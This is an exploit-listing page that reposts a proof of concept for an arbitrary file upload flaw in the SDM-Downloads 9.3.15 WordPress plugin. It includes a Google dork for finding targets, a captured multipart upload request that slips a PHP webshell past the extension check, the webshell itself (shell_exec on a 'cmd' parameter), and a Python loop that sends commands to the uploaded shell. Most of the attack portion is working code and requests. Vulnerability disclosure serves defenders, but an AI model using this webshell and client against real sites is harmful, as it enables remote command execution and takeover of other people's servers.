Advertisement






SDM-Downloads 9.3.15 Privilege Escalation Arbritrary File Upload

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XXX Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2023-01-06
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023010008

Below is a copy:

SDM-Downloads 9.3.15 Privilege Escalation Arbritrary File Upload
# Exploit Title: Arbritrary File Upload - Privilege Escalation:  The Editor can bypass extension allowed this can lead to RCE 
# Google Dork: inurl:/sdm-downloads/
# Date: 04/01/2023
# Exploit Author: Luth1er
# Vendor Homepage: https://simple-download-monitor.com/
# Software Link: https://downloads.wordpress.org/plugin/simple-download-monitor.zip
# Version: 9.3.15

The Editor can ignore extensions allowed by the plugin and send shell code in php.

Step to reproduce: 

1 - Login in the editor account 
2 - go to add new sdm-downloads post.
3 - go to downloadable file , open the burpsuite and capture this request.
4 - choose your php webshell, after that you need change the file header for html in the request.

POST http://localhost/wp-admin/async-upload.php
Accept */*
Accept-Encoding gzip, deflate, br
Accept-Language : en-US,en;q=0.5
Connection : keep-alive
Content-Length : 822
Content-Type : multipart/form-data; boundary=---------------------------42010083933333799326780521202
Cookie : wordpress_86a9106ae65537651a8e456835b316ab=luth1er%7C1672966581%7C9irtxcxkQw5MdB1z22zzRoTcrJa9GZhlUSFI3vxkpX6%7C5250a3994bfb10de1601bbc2243e838191e8ff24b815a9875190bc8b23837d99; wp-settings-1=libraryContent%3Dbrowse%26urlbutton%3Dfile%26align%3Dcenter%26editor%3Dtinymce%26mfold%3Do; wp-settings-time-1=1672804801; wp_wpfileupload_86a9106ae65537651a8e456835b316ab=f8M5gaey5s2Y9AbpOheTm1ymwc9Waqta; PHPSESSID=002lmr7b4084cao099npqhspnb; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=luth1er%7C1672966581%7C9irtxcxkQw5MdB1z22zzRoTcrJa9GZhlUSFI3vxkpX6%7C08158594f72785ab694bfe58473e905d74d352ff23956c602fd739eff55fbd0b; wp_lang=en_US
Host : localhost
Origin : http://localhost
Referer : http://localhost/wp-admin/post.php?post=145&action=edit
Sec-Fetch-Dest : empty
Sec-Fetch-Mode : cors
Sec-Fetch-Site : same-origin
User-Agent : Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0

-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="name"

webshell.html
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="action"

upload-attachment
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="_wpnonce"

bdc1866b26
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="auto_watermark"

1
-----------------------------42010083933333799326780521202
Content-Disposition: form-data; name="async-upload"; filename="webshell.html"
Content-Type: text/html

<html>
<?php

$command = $_GET['cmd'];
$command = shell_exec($command);
echo $command;

?>
</html>

-----------------------------42010083933333799326780521202--

import requests
import sys, os

os.system('clear')

banner  = """
                 /$$                             /$$                                   /$$                           /$$          
                | $$                            | $$                                  | $$                          | $$          
  /$$$$$$$  /$$$$$$$ /$$$$$$/$$$$           /$$$$$$$  /$$$$$$  /$$  /$$  /$$ /$$$$$$$ | $$  /$$$$$$   /$$$$$$   /$$$$$$$  /$$$$$$$
 /$$_____/ /$$__  $$| $$_  $$_  $$ /$$$$$$ /$$__  $$ /$$__  $$| $$ | $$ | $$| $$__  $$| $$ /$$__  $$ |____  $$ /$$__  $$ /$$_____/
|  $$$$$$ | $$  | $$| $$ \ $$ \ $$|______/| $$  | $$| $$  \ $$| $$ | $$ | $$| $$  \ $$| $$| $$  \ $$  /$$$$$$$| $$  | $$|  $$$$$$ 
 \____  $$| $$  | $$| $$ | $$ | $$        | $$  | $$| $$  | $$| $$ | $$ | $$| $$  | $$| $$| $$  | $$ /$$__  $$| $$  | $$ \____  $$
 /$$$$$$$/|  $$$$$$$| $$ | $$ | $$        |  $$$$$$$|  $$$$$$/|  $$$$$/$$$$/| $$  | $$| $$|  $$$$$$/|  $$$$$$$|  $$$$$$$ /$$$$$$$/
|_______/  \_______/|__/ |__/ |__/         \_______/ \______/  \_____/\___/ |__/  |__/|__/ \______/  \_______/ \_______/|_______/ 

                                                Version: 9.3.15
                                        Privilege escalation: WebShell
"""
print (banner)
while True:
        exec_payload = input("[+] Payload: ")
        print ('')
        if exec_payload == 'exit':
                break;
        if exec_payload == 'clear':
                os.system('clear')
        else:
                re = requests.get('http://localhost/wp-content/uploads/2023/01/alert.html?cmd='+exec_payload)
                print (re.text)


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.